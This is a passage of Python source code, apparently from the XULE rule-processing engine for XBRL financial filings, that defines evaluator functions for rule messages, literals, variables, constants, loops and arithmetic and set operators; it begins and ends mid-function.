                        # Default the focus to the first fact gathered during evaluation.
                        rule_focus = next(iter(xule_context.facts.keys()), None)
                    # Prep the main_message for the logger. The logger wants a %-style format string and the substitutions passed as named arguments.
                    if isinstance(main_message, XuleString):
                        format_string_message = main_message.format_string
                        substitutions = main_message.substitutions
                    else:
                        format_string_message = main_message
                        substitutions = dict()
                    # combine the substitutions and the messages dictionary
                    messages.update(substitutions)
                    xule_context.global_context.message_queue.log(severity.upper(),
                                                                  full_rule_name,
                                                                  _(format_string_message),
                                                                  # sourceFileLine=source_location,
                                                                  filing_url=filing_url,
                                                                  modelObject=rule_focus,
                                                                  **messages)
                else:
                    xule_context.iter_pass_count += 1
            else:
                xule_context.iter_misaligned_count += 1
        # xule_context.iteration_table.del_current()
        # if xule_context.iteration_table.is_empty:
        # Advance to the next iteration; stop when the table for this rule is exhausted.
        xule_context.iteration_table.next(assert_rule['node_id'])
        if xule_context.iteration_table.is_table_empty(assert_rule['node_id']):
            break
        else:
            xule_context.reset_iteration()
def evaluate_output_rule(output_rule, xule_context):
    """Evaluator for an output rule.

    :param output_rule: Rule expression for an output rule
    :type output_rule: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext

    This evaluator evaluates an output rule. It will keep evaluating the output rule until the iteration table is empty. This
    is how it can produce multiple messages for a single rule.

    An output rule will produce a value and then create a message based on the evaluated value.
    """
    # Keep evaluating the rule while there are iterations. This is done in a While True loop so there is always at least one iteration. This is for rules that
    # do not have iterable expressions in them (i.e. 1 + 2).
    while True:
        xule_context.iter_count += 1
        try:
            xule_value = evaluate(output_rule['body'], xule_context)
        except XuleIterationStop:
            # An unbound result for this iteration - no message, move to the next iteration.
            xule_context.iter_pass_count += 1
            pass
        except:
            xule_context.iter_except_count += 1
            raise
        else:
            # There were no exceptions. Check the results of the rule and create the message.
            # Check if the rule expects only aligned values. When a rule has aligned values then the none aligned results are ignored.
            # This prevents a rule like 1 + @Assets from producing a result when there are no Assets in a filing. When this happens, the @Assetss will have
            # a none aligned unbound value. The plus operation will treat this as 0 and produce a value of 1. However, this value should not result in a message.
            # When a factset is evluated, it trips the aligned_result_only flag.
            if xule_value.type != 'unbound' and not (
                    xule_context.iteration_table.current_alignment is None and xule_context.aligned_result_only):
                # Determine if a message should be sent
                xule_context.iter_message_count += 1
                messages = dict()
                # Process each of the results in the rule. The Results are the messages that are produced.
                for rule_result in output_rule.get('results', list()):
                    messages[rule_result['resultName']] = result_message(output_rule, rule_result, xule_value,
                                                                         xule_context)
                # get severity
                if 'severity' not in messages:
                    # default severity
                    messages['severity'] = 'info'
                severity = messages['severity']
                # message - this is the main message. Unlike assertions, the rule's own
                # value is the default message when none is supplied.
                main_message = messages.get('message', xule_value)
                if main_message.type == 'string':
                    main_message = main_message.value
                else:
                    main_message = main_message.format_value()
                messages.pop('message', None)
                full_rule_name = xule_context.rule_name
                # Handle rule suffix
                if 'rule-suffix' in messages:
                    full_rule_name += '.' + messages['rule-suffix']
                filing_url = xule_context.model.modelDocument.uri if xule_context.model is not None else ''
                # The rule_focus is the model object that is the focus fo the rule. This can be a modelFact, modelConcept or modelDocument.
                # It is used by the logger to provide additional location information about the thing (i.e. fact) that is the focus of the
                # message fom the rule.
                rule_focus = messages.pop('rule-focus', None)
                if rule_focus is None:
                    # Default the focus to the first fact gathered during evaluation.
                    rule_focus = next(iter(xule_context.facts.keys()), None)
                # Prep the main_message for the logger. The logger wants a %-style format string and the substitutions passed as named arguments.
                if isinstance(main_message, XuleString):
                    format_string_message = main_message.format_string
                    substitutions = main_message.substitutions
                else:
                    format_string_message = main_message
                    substitutions = dict()
                # combine the substitutions and the messages dictionary
                messages.update(substitutions)
                xule_context.global_context.message_queue.log(severity.upper(),
                                                              full_rule_name,
                                                              _(format_string_message),
                                                              # sourceFileLine=source_location,
                                                              filing_url=filing_url,
                                                              modelObject=rule_focus,
                                                              **messages)
            else:
                xule_context.iter_misaligned_count += 1
        # xule_context.iteration_table.del_current()
        # if xule_context.iteration_table.is_empty:
        # Advance to the next iteration; stop when the table for this rule is exhausted.
        xule_context.iteration_table.next(output_rule['node_id'])
        if xule_context.iteration_table.is_table_empty(output_rule['node_id']):
            break
        else:
            xule_context.reset_iteration()
def evaluate_bool_literal(literal, xule_context):
    """Evaluator for literal boolean expressions.

    :param literal: Rule expression
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    :raises XuleProcessingError: if the literal value is neither 'true' nor 'false'

    A boolean literal is either 'true' or 'false'.
    """
    if literal['value'] == "true":
        return XuleValue(xule_context, True, 'bool')
    elif literal['value'] == "false":
        return XuleValue(xule_context, False, 'bool')
    else:
        # Bug fix: 'literal' is a dict, so the original 'literal.value' raised
        # AttributeError here instead of the intended XuleProcessingError.
        raise XuleProcessingError(_("Invalid boolean literal found: %s" % literal['value']), xule_context)
def evaluate_period_literal(literal, xule_context):
    """Evaluate a period literal.

    :param literal: Rule expression
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    Currently, the only type of period literal is 'forever'. Other periods
    (instant, duration) are created using the period() function.
    """
    if not literal.get('forever', False):
        return XuleValue(xule_context, None, 'none')
    # 'forever' is modeled as the widest possible duration.
    return XuleValue(xule_context, (datetime.datetime.min, datetime.datetime.max), 'duration')
def evaluate_string_literal(literal, xule_context):
    """Evaluate a string literal.

    :param literal: Rule expression
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    A string literal is a list of components: plain character runs, escape
    sequences and embedded expressions. For example:

        "The value of the rule is {$rule-value}.\nThis is based on the fact value {$fact}."

    breaks down into base strings, the expressions $rule-value and $fact, and
    the escape "\n". The components are assembled into a XuleString, which is a
    str subclass that also keeps the format string and the expression
    substitutions separately - useful when logging messages to arelle.
    """
    format_string = ''
    substitutions = []
    sub_count = 0
    # Supported escape codes; any other escaped character passes through unchanged.
    escape_map = {'n': '\n', 't': '\t'}
    for part in literal['stringList']:
        part_type = part['exprName']
        if part_type == 'baseString':
            format_string += part['value']
        elif part_type == 'escape':
            format_string += escape_map.get(part['value'], part['value'])
        else:
            # Embedded expression. The result is not placed in the format string
            # directly; a substitution record is kept instead:
            # (position in format string, substitution name, substitution value).
            part_value = evaluate(part, xule_context)
            substitutions.append((len(format_string), 'sub{}'.format(sub_count), part_value.format_value()))
            sub_count += 1
    return XuleValue(xule_context, XuleString(format_string, substitutions), 'string')
def evaluate_int_literal(literal, xule_context):
    """Evaluator for literal integer expressions.

    :param literal: Rule expression containing the integer text in 'value'
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    return XuleValue(xule_context, int(literal['value']), 'int')
def evaluate_float_literal(literal, xule_context):
    """Evaluator for literal float expressions.

    :param literal: Rule expression containing the float text in 'value'
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    return XuleValue(xule_context, float(literal['value']), 'float')
def evaluate_void_literal(literal, xule_context):
    """Evaluator for literal void expressions.

    :param literal: Rule expression; 'value' is either 'none' or 'skip'
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    A 'none' literal produces a none value; a 'skip' literal produces an
    unbound value.
    """
    value_type = 'none' if literal['value'] == 'none' else 'unbound'
    return XuleValue(xule_context, None, value_type)
def evaluate_qname_literal(literal, xule_context):
    """Evaluator for literal qname expressions.

    :param literal: Rule expression with 'prefix', 'namespace_uri' and 'localName'
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    # A '*' prefix stands for "no prefix".
    prefix = None if literal['prefix'] == '*' else literal['prefix']
    return XuleValue(xule_context,
                     QName(prefix, literal['namespace_uri'], literal['localName']),
                     'qname')
def evaluate_severity(severity_expr, xule_context):
    """Evaluator for literal severity expressions.

    :param severity_expr: Rule expression containing the severity in 'value'
    :type severity_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    return XuleValue(xule_context, severity_expr['value'], 'severity')
def evaluate_aspect_name(literal, xule_context):
    """Evaluator for literal aspect name expressions.

    :param literal: Rule expression containing the aspect name in 'value'
    :type literal: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    An aspect name literal is one of the built-in aspects of a factset:
    'concept', 'unit', 'entity' or 'period'.
    """
    return XuleValue(xule_context, literal['value'], 'aspect_name')
def evaluate_string_keyword(expr, xule_context):
    """Evaluator for literal string-based keyword expressions.

    :param expr: Rule expression containing the keyword in 'value'
    :type expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    Some keywords are evaluated as strings. This is used for balance types
    ('credit', 'debit') and period types ('instant', 'duration').
    """
    return XuleValue(xule_context, expr['value'], 'string')
def evaluate_tagged(tagged_expr, xule_context):
    """Evaluator for tagged expressions.

    :param tagged_expr: Rule expression with the inner 'expr' and the 'tagName'
    :type tagged_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    A tagged expression is an expression followed by a # sign and a tag name.
    The evaluated value is recorded under the tag name so it can be used in
    messages.
    """
    tag_name = tagged_expr['tagName']
    try:
        tagged_value = evaluate(tagged_expr['expr'], xule_context)
    except XuleIterationStop as xis:
        # Still record the tag for the stop value so messages can use it.
        xule_context.tags[tag_name] = xis.stop_value.tag
        raise
    if tagged_value.tags is None:
        tagged_value.tags = {tag_name: tagged_value}
    else:
        tagged_value.tags[tag_name] = tagged_value
    return tagged_value
def tag_default_for_factset(aspect_filters, xule_context):
    """Get the value of the concept aspect for tagging the default None fact of a factset.

    :param aspect_filters: Mapping of aspect_info keys to aspect values for the factset
    :type aspect_filters: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :returns: A display string describing the concept(s) the factset filters on,
        or 'unknown' when no usable concept aspect is present.
    :rtype: str
    """
    for aspect_info, aspect_value in aspect_filters.items():
        # aspect_info is the key of the aspect_filters dictionary. It is a tuple:
        # 0 = type (builtin or explicit_dimension), 1 = aspect name, 2 = wildcard,
        # 3 = operator, 4 = properties
        if aspect_info[0] == 'builtin' and aspect_info[1] == 'concept':
            if aspect_info[2] is None:  # there isn't a wildcard
                if aspect_info[3] == '=':  # the operator is '=' and it is not a wildcard
                    return str(aspect_value)
                elif aspect_info[3] == 'in':
                    # The aspect_value is a list or set of names (values of type
                    # 'qname' or 'concept').
                    concepts = []
                    for aspect_name in aspect_value.value:
                        # Bug fix: the original compared the value object itself to the
                        # type names (aspect_name == 'qname'), which is never true; the
                        # .value/.value.qname accesses show the intent is a type check.
                        if aspect_name.type == 'qname':
                            concepts.append(str(aspect_name.value))
                        elif aspect_name.type == 'concept':
                            concepts.append(str(aspect_name.value.qname))
                    if len(concepts) == 1:  # bug fix: was misspelled 'concetps' (NameError)
                        return str(concepts[0])
                    else:
                        return 'one of (' + ', '.join(concepts) + ')'
    # If we get here, then the default tag is unknown
    return 'unknown'
def evaluate_block(block_expr, xule_context):
    """Evaluator for block expressions.

    :param block_expr: Rule expression
    :type block_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    A block expression is a series of variable declarations followed by an
    expression. Each declared variable is registered on the context and
    eagerly calculated, then the trailing expression is evaluated as the
    value of the block.
    """
    for declaration in block_expr['varDeclarations']:
        var_info = xule_context.add_var(declaration['varName'],
                                        declaration['node_id'],
                                        declaration['varName'],  # tagged - all variables are tagged by name
                                        declaration['body'])
        calc_var(var_info, None, xule_context)
    return evaluate(block_expr['expr'], xule_context)
def evaluate_var_ref(var_ref, xule_context):
    """Evaluator for variable reference expressions.

    :param var_ref: Rule expression with 'varName' and 'var_declaration'
    :type var_ref: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    Looks up the variable's metadata by name and declaration id, then
    delegates to calc_var to produce (or retrieve) its value. A
    XuleIterationStop raised during calculation propagates to the caller.
    """
    var_info = xule_context.find_var(var_ref['varName'], var_ref['var_declaration'])
    return calc_var(var_info, var_ref, xule_context)
def calc_var(var_info, const_ref, xule_context):
    """Calculate the value of a variable

    :param var_info: A dictionary of meta data about the variable
    :type var_info: dict
    :param const_ref: The constant declaration if the variable reference is for a constant
    :type const_ref: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    This function evaluates the expression for the variable reference.
    Arguments return their pre-calculated value; plain variables are lazily
    evaluated once and cached on var_info; constants are evaluated in their
    own table. The returned value is always a clone so callers cannot mutate
    the cached value, and tagged variables are recorded in the context tags.
    """
    if var_info['type'] == xule_context._VAR_TYPE_ARG:
        # Arguments (e.g. for-loop variables, function args) are pre-computed.
        var_value = var_info['value']
    elif var_info['type'] == xule_context._VAR_TYPE_VAR:
        if var_info['calculated'] == False:
            # Lazily evaluate the variable expression, isolating the
            # aligned_result_only and used_expressions bookkeeping so the
            # variable's contribution can be recorded on its value.
            try:
                saved_aligned_result_only = xule_context.aligned_result_only
                saved_used_expressions = xule_context.used_expressions
                xule_context.aligned_result_only = False
                xule_context.used_expressions = set()
                try:
                    var_info['value'] = evaluate(var_info['expr'], xule_context)
                    var_info['value'].aligned_result_only = xule_context.aligned_result_only
                    var_info['value'].used_expressions = xule_context.used_expressions
                    var_info['calculated'] = True
                except XuleIterationStop as xis:
                    # An iteration stop still produces a (stop) value which is
                    # cached like a normal result.
                    var_info['value'] = xis.stop_value
                    var_info['value'].aligned_result_only = xule_context.aligned_result_only
                    var_info['value'].used_expressions = xule_context.used_expressions
                    var_info['calculated'] = True
            finally:
                # Merge the isolated bookkeeping back into the context.
                xule_context.aligned_result_only = xule_context.aligned_result_only or saved_aligned_result_only
                xule_context.used_expressions = saved_used_expressions | xule_context.used_expressions
        var_value = var_info['value']
    elif var_info['type'] == xule_context._VAR_TYPE_CONSTANT:
        # We should only end up here the first time the constant is referenced for the iteration.
        # The var_info is really the constant info from the global context
        var_value = evaluate(var_info['expr'], xule_context, override_table_id=const_ref['table_id'])
    else:
        # Fixed typo in the error message ("unkown" -> "unknown").
        raise XuleProcessingError(_("Internal error: unknown variable type '%s'" % var_info['type']), xule_context)
    # Clone so the cached value cannot be mutated by the caller.
    var_value = var_value.clone()
    if var_info['tagged'] is not None:
        xule_context.tags[var_info['tagged']] = var_value
    return var_value
def calc_constant(const_info, const_context):
    """Calculate the value of a constant

    :param const_info: Meta data about the constant
    :type const_info: dict
    :param const_context: Rule processing context
    :type const_context: XuleRuleContext
    :returns: The evaluated value or values
    :rtype: XuleValue or XuleValueSet

    Constants are evaluated in a separate table. This isolates the evaluation from the rule which is using the constant. If the
    constant produces a singleton value a single value is returned. If the constant produces multiple values, a value set is returned.
    The results are cached on const_info ('value' and 'calculated').
    """
    # Evaluate in a dedicated iteration table keyed by the constant's node id.
    const_context.iteration_table.add_table(const_info['expr']['node_id'],
                                            const_context.get_processing_id(const_info['expr']['node_id']))
    const_values = XuleValueSet()
    # Iterate until the constant's table is exhausted, collecting one value
    # per iteration.
    while True:
        const_context.aligned_result_only = False
        const_context.used_expressions = set()
        try:
            const_value = evaluate(const_info['expr']['body'], const_context)
        except XuleIterationStop as xis:
            # An iteration stop still yields a (stop) value for this iteration.
            const_value = xis.stop_value
        # Attach per-iteration bookkeeping to the value.
        const_value.facts = const_context.facts.copy()
        const_value.tags = const_context.tags.copy()
        const_value.aligned_result_only = const_context.aligned_result_only
        try:
            const_value.alignment = const_context.iteration_table.current_table.current_alignment
        except AttributeError:
            # This happens if there isn't a current table because it was never created.
            pass
        const_values.append(const_value)
        # Advance to the next iteration of the constant's table.
        if not const_context.iteration_table.is_empty:
            const_context.iteration_table.next(const_context.iteration_table.current_table.table_id)
        if const_context.iteration_table.is_table_empty(const_info['expr']['node_id']):
            break
    # reset the aligned only results.
    const_info['expr']['aligned_only_results'] = const_context.aligned_result_only
    # Cache the full value set on the constant's meta data.
    const_info['value'] = const_values
    const_info['calculated'] = True
def override_constant_calc(const_info, xule_context):
    """Set a constant's value from a supplied override.

    Instead of evaluating the constant's expression, the value supplied in
    xule_context.constant_overrides (keyed by the constant's name) is wrapped
    in a value set, stored on the constant's meta data, and the constant is
    marked as calculated.

    :param const_info: Meta data about the constant
    :type const_info: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    """
    override_value = xule_context.constant_overrides[const_info['name']]
    const_info['value'] = XuleValueSet(override_value)
    const_info['calculated'] = True
def evaluate_constant_assign(const_assign, xule_context):
    """Evaluator for a constant declaration

    :param const_assign: Rule expression for the constant declaration
    :type const_assign: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    const_info = xule_context.find_var(const_assign['constantName'], const_assign['node_id'], constant_only=True)
    if const_info is None:
        raise XuleProcessingError(_("Constant '%s' not found" % const_assign['constantName']), xule_context)
    if not const_info['calculated']:
        # Check if there is a xule-arg that overrides the constant
        if const_assign['constantName'] in xule_context.constant_overrides:
            override_constant_calc(const_info, xule_context)
        else:  # calc the constant
            # Constants are evaluated in their own rule context so the
            # calculation is isolated from the referencing rule.
            const_context = XuleRuleContext(xule_context.global_context, None,
                                            xule_context.cat_file_num)
            calc_constant(const_info, const_context)
            # Clean up
            del const_context
    if 'is_iterable' in const_assign:
        # return the entire value set
        return const_info['value']
    else:
        # retrieve the single (non-aligned) value
        return const_info['value'].values[None][0]
def process_precalc_constants(global_context):
    """Precalculate constants

    :param global_context: Global processing context
    :type global_context: XuleGlobalContext

    This function will calculate constants that do not depend directly on the instance.
    """
    global_context.message_queue.logging("Precalcing non-instance constants")
    for constant_name, cat_constant in global_context.rule_set.catalog['constants'].items():
        # Only constants that are used and have no instance dependency can be
        # calculated before an instance is loaded.
        if ('unused' not in cat_constant and
                not cat_constant['dependencies']['instance']):
            const_context = XuleRuleContext(global_context, constant_name, cat_constant['file'])
            const_info = const_context.find_var(constant_name, cat_constant['node_id'])
            # Skip constants that were already calculated (e.g. via override).
            if not const_info['calculated']:
                calc_constant(const_info, const_context)
            # Clean up
            del const_context
def evaluate_if(if_expr, xule_context):
    """Evaluator for if expressions

    The if and any else-if branches are flattened into (condition, then)
    pairs which are tried in order. A missing (none/unbound) condition makes
    the whole expression unbound; a non-boolean condition is an error. If no
    condition is true the else branch supplies the result.

    :param if_expr: Rule expression for the if expression
    :type if_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    branches = [(if_expr['condition'], if_expr['thenExpr'])]
    branches.extend((else_if['condition'], else_if['thenExpr'])
                    for else_if in if_expr.get('elseIfExprs', []))

    for condition_expr, then_expr in branches:
        condition_value = evaluate(condition_expr, xule_context)
        if condition_value.type in ('unbound', 'none'):
            return XuleValue(xule_context, None, 'unbound')
        if condition_value.type != 'bool':
            raise XuleProcessingError(_("If condition is not a boolean, found '%s'" % condition_value.type),
                                      xule_context)
        if condition_value.value:
            return evaluate(then_expr, xule_context)

    # No condition was true - evaluate the else branch.
    return evaluate(if_expr['elseExpr'], xule_context)
def evaluate_for(for_expr, xule_context):
    """Evaluator for for expressions

    :param for_expr: Rule expression for the for expression
    :type for_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValueSet
    """
    for_values = XuleValueSet()
    # Isolate used-expression tracking while evaluating the loop collection.
    saved_used_expressions = xule_context.used_expressions
    xule_context.used_expressions = set()
    try:
        for_loop_collection = evaluate(for_expr['forLoopExpr'], xule_context)
    finally:
        used_expressions = xule_context.used_expressions
        xule_context.used_expressions = saved_used_expressions | used_expressions
    if for_loop_collection.type not in ('list', 'set'):
        raise XuleProcessingError(_("For loop requires a set or list, found '{}'.".format(for_loop_collection.type)),
                                  xule_context)
    # Evaluate the body once per member of the loop collection.
    for for_loop_var in for_loop_collection.value:
        # Propagate the expressions used to produce the collection onto each
        # loop value.
        if for_loop_var.used_expressions is None:
            for_loop_var.used_expressions = used_expressions
        else:
            for_loop_var.used_expressions.update(used_expressions)
        # Make the loop variable visible to the body as an argument.
        xule_context.add_arg(for_expr['forVar'],
                             for_expr['forLoopExpr']['node_id'],
                             for_expr['forVar'],  # tagged - all variables are automatically tagged
                             for_loop_var,
                             'single')
        try:
            body_values = evaluate_for_body_detail(for_expr['forBodyExpr'],
                                                   for_expr['node_id'],
                                                   for_loop_var,
                                                   for_expr['forVar'],  # tag name
                                                   xule_context)
        finally:
            xule_context.del_arg(for_expr['forVar'], for_expr['forLoopExpr']['node_id'])
        # Merge the body results into the overall value set, respecting the
        # alignment of the loop value.
        if for_loop_var.alignment is None:
            # add all
            for body_value in body_values.values.values():
                for_values.append(body_value)
        else:
            if for_loop_var.alignment in body_values.values:
                # take the aligned values
                for body_value in body_values.values[for_loop_var.alignment]:
                    for_values.append(body_value)
            else:
                # take only none aligned values and add alignment
                for body_value in body_values.values[None]:
                    body_value.alignment = for_loop_var.alignment
                    for_values.append(body_value)
    return for_values
def evaluate_for_body_detail(body_expr, table_id, for_loop_var, for_loop_tag, xule_context):
    """Evaluates the for body

    :param body_expr: Rule expression for the for body
    :type body_expr: dict
    :param table_id: The table id for the sub table to evaluate the for body
    :type table_id: int
    :param for_loop_var: The xule value of the for loop variable
    :type for_loop_var: XuleValue
    :param for_loop_tag: Tag name under which the loop value is recorded
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValueSet
    """
    body_values = XuleValueSet()
    aligned_result_only = False
    # Save context flags so they can be restored after the body iterations.
    save_aligned_result_only = xule_context.aligned_result_only
    save_used_expressions = xule_context.used_expressions
    # The body runs in its own aggregation sub-table keyed by table_id.
    for_body_table = xule_context.iteration_table.add_table(table_id, xule_context.get_processing_id(table_id),
                                                            is_aggregation=True)
    for_body_table.dependent_alignment = for_loop_var.alignment
    try:
        # Iterate the body table until it is exhausted, producing one body
        # value per iteration.
        while True:
            xule_context.aligned_result_only = False
            xule_context.used_expressions = set()
            xule_context.tags[for_loop_tag] = for_loop_var
            body_value = XuleValue(xule_context, None, 'unbound')
            try:
                body_value = evaluate(body_expr, xule_context)
            except XuleIterationStop:
                # A stopped iteration contributes the default unbound value.
                pass
            # aligned_result_only is sticky across iterations of the body.
            aligned_result_only = aligned_result_only or xule_context.aligned_result_only
            body_value.alignment = for_body_table.current_alignment
            body_value.aligned_result_only = aligned_result_only
            body_value.facts = xule_context.iteration_table.facts.copy()
            body_value.tags = xule_context.iteration_table.tags.copy()
            body_value.used_expressions = xule_context.used_expressions
            body_values.append(body_value)
            xule_context.iteration_table.next(for_body_table.table_id)
            if for_body_table.is_empty:
                break
    finally:
        # Restore the context and remove the body's sub-table even on error.
        xule_context.aligned_result_only = save_aligned_result_only
        xule_context.used_expressions = save_used_expressions
        xule_context.iteration_table.del_table(for_body_table.table_id)
    return body_values
def evaluate_unary(unary_expr, xule_context):
    """Evaluator for unary expressions

    A unary expression applies a '+' or '-' sign to a numeric operand. The
    '-' operator flips the sign; '+' leaves the value unchanged. A missing
    (unbound/none) operand passes through untouched.

    :param unary_expr: Rule expression for the unary expression
    :type unary_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    operand = evaluate(unary_expr['expr'], xule_context)

    if operand.type in ('unbound', 'none'):
        return operand

    if operand.type not in ('int', 'float', 'decimal'):
        raise XuleProcessingError(_("Unary operator requires a numeric operand, found '%s'" % operand.type),
                                  xule_context)

    if unary_expr['op'] != '-':
        return operand
    # Negate for the '-' operator.
    return XuleValue(xule_context, operand.value * -1, operand.type)
def evaluate_in(in_expr, xule_context):
    """Evaluator for in expressions

    Evaluates left-to-right: the running result is tested for membership in
    each successive right-hand container. A missing (unbound/none) container
    makes the running result unbound.

    :param in_expr: Rule expression for the in expression
    :type in_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    result = evaluate(in_expr['leftExpr'], xule_context)
    for right_side in in_expr['rights']:
        container = evaluate(right_side['rightExpr'], xule_context)
        if container.type in ('unbound', 'none'):
            result = XuleValue(xule_context, None, 'unbound')
        else:
            # Membership is delegated to the 'contains' property.
            result = XuleProperties.property_contains(xule_context, container, result)
    return result
def evaluate_mult(mult_expr, xule_context):
    """Evaluator for multiplication expressions

    :param mult_expr: Rule expression for the multiplication expression
    :type mult_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    This include multiplication and division
    """
    left = evaluate(mult_expr['leftExpr'], xule_context)
    for right_side in mult_expr['rights']:
        operator = right_side['op']
        right = evaluate(right_side['rightExpr'], xule_context)
        if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
            # A missing operand makes the running result unbound.
            left = XuleValue(xule_context, None, 'unbound')
        else:
            # at this point there should only be numerics.
            if left.type not in ('int', 'float', 'decimal'):
                raise XuleProcessingError(
                    _("The left operand of '%s' is not numeric, found '%s'" % (operator, left.type)), xule_context)
            if right.type not in ('int', 'float', 'decimal'):
                raise XuleProcessingError(
                    _("The right operand of '%s' is not numeric, found '%s'" % (operator, right.type)), xule_context)
            # Coerce both operands to a common numeric type.
            combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
            '''NEED TO HANDLE CHNAGES IN UNIT ALIGNMENT'''
            if operator == '*':
                left = XuleValue(xule_context, left_compute_value * right_compute_value, combined_type)
            else:
                # This is division
                if right_compute_value == 0:
                    raise XuleProcessingError(_("Divide by zero error."), xule_context)
                # int / int promotes to float (Python true division).
                left = XuleValue(xule_context, left_compute_value / right_compute_value, 'float' if combined_type == 'int' else combined_type)
    return left
def evaluate_intersect(inter_expr, xule_context):
    """Evaluator for intersection expressions

    :param inter_expr: Rule expression for the intersection expression
    :type inter_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    This is intersection of 2 sets.
    """
    left = evaluate(inter_expr['leftExpr'], xule_context)
    for right_side in inter_expr['rights']:
        right = evaluate(right_side['rightExpr'], xule_context)
        if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
            # NOTE(review): 'left' becomes 'unbound' here but execution falls
            # through to the set-type checks below, which will then raise a
            # processing error. Sibling evaluators (e.g. evaluate_mult) skip
            # the calculation instead - confirm this fall-through is intended.
            left = XuleValue(xule_context, None, 'unbound')
        if left.type != 'set':
            raise XuleProcessingError(
                _("Intersection can only operatate on sets. The left side is a '{}'.".format(left.type)), xule_context)
        if right.type != 'set':
            raise XuleProcessingError(
                _("Intersection can only operatate on sets. The right side is a '{}'.".format(right.type)),
                xule_context)
        left = XuleUtility.intersect_sets(xule_context, left, right)
    return left
def evaluate_symetric_difference(sym_diff_expr, xule_context):
    """Evaluator for symetric difference expressions

    :param sym_diff_expr: Rule expression for the symetric difference expression
    :type sym_diff_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    This is the symetric difference of 2 sets.
    """
    left = evaluate(sym_diff_expr['leftExpr'], xule_context)
    for right_side in sym_diff_expr['rights']:
        right = evaluate(right_side['rightExpr'], xule_context)
        if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
            # NOTE(review): as in evaluate_intersect, 'left' becomes 'unbound'
            # here but the set-type checks below will then raise. Confirm the
            # fall-through is intended.
            left = XuleValue(xule_context, None, 'unbound')
        if left.type != 'set':
            raise XuleProcessingError(
                _("Symetric difference can only operatate on sets. The left side is a '{}'.".format(left.type)),
                xule_context)
        if right.type != 'set':
            raise XuleProcessingError(
                _("Symetric difference can only operatate on sets. The right side is a '{}'.".format(right.type)),
                xule_context)
        left = XuleUtility.symetric_difference(xule_context, left, right)
    return left
def evaluate_add(add_expr, xule_context):
    """Evaluator for add expressions

    :param add_expr: Rule expression for the add expression
    :type add_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    This includes add and subtract. These operations can be perforom on numbers, strings, sets and list. For strings
    adding wil concatenation. For lists and strings, adding will union.

    In other binary operations, if an operand does not exist the operation is not performed. With add and subtract, if an
    operand is missing, it will treated as if it were zero. For example:
        @Assets + @Liabilities
    If there isn't a matching liability for an asset, the operation will return the value of assets.

    A bar on the operator ('<' on the left, '>' on the right, e.g. '<+>')
    makes the corresponding operand required: a missing required operand
    stops the iteration instead of defaulting.
    """
    left_bar = add_expr['rights'][0]['op'][0] == '<'  # the first operator
    if left_bar:
        # Required left operand - let an iteration stop propagate.
        left = evaluate(add_expr['leftExpr'], xule_context)
    else:
        # unbound is allowed, so it needs to be captured.
        try:
            left = evaluate(add_expr['leftExpr'], xule_context)
        except XuleIterationStop as xis:
            left = xis.stop_value
    for right in add_expr['rights']:
        operator = right['op']
        # The bars on this operator determine which operands are required.
        right_bar = operator[-1] == '>'
        left_bar = operator[0] == '<'
        right_expr = right['rightExpr']
        if left.type not in (
                'int', 'float', 'decimal', 'string', 'uri', 'instant', 'time-period', 'set', 'list', 'unbound', 'none'):
            raise XuleProcessingError(_("Left side of a {} operation cannot be {}.".format(operator, left.type)),
                                      xule_context)
        if right_bar:
            # Required right operand - let an iteration stop propagate.
            right = evaluate(right_expr, xule_context)
        else:
            # unbound is allowed, so it needs to be captured.
            try:
                right = evaluate(right_expr, xule_context)
            except XuleIterationStop as xis:
                right = xis.stop_value
        if right.type not in (
                'int', 'float', 'decimal', 'string', 'uri', 'instant', 'time-period', 'set', 'list', 'unbound', 'none'):
            raise XuleProcessingError(_("Right side of a {} operation cannot be {}.".format(operator, right.type)),
                                      xule_context)
        # A time-period can be on the left only if the right is also a time period.
